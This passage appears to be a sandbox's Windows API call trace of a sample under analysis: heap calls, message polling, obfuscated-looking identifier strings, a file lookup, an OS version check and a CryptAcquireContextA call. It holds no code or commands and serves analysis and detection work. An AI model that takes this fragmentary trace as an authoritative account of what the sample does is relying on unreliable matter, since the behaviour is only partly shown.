nFileSizeHigh=0x0, nFileSizeLow=0x8889, dwReserved0=0x0, dwReserved1=0x0, cFileName="LloJL.jpg", cAlternateFileName="")) returned 0x9e2078 [0210.710] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0210.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0210.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.711] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0210.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0210.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0210.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0210.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0210.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0210.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0210.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0210.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0210.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0210.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0210.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.712] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.712] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0210.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0210.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.712] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.712] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0210.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0210.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.712] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0210.712] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.712] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0210.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.712] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.713] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0210.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0210.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.713] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0210.713] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0210.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0210.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0210.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0210.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0210.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.715] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.715] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0210.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0210.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0210.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.716] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.716] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.716] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0210.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0210.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.716] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.716] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0210.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0210.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.716] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0210.717] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0210.717] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.717] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.717] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.717] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.718] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0210.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0210.718] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.718] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.718] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0210.718] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.718] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0210.718] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0210.718] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0210.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7160, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0210.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0210.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6ea0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0210.719] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c990) returned 1 [0210.719] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.719] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.719] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0210.719] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.720] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0210.720] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.720] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.720] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.720] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.720] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.720] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.720] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0210.720] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.720] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0210.720] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.720] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.720] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.720] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.720] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.720] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.720] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.720] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0210.720] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.720] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0210.720] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.720] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.721] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.721] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.721] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.721] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.721] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.721] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0210.721] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.721] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0210.721] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.721] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.721] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.721] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.721] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.721] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.721] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.721] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.721] PeekMessageW (in: 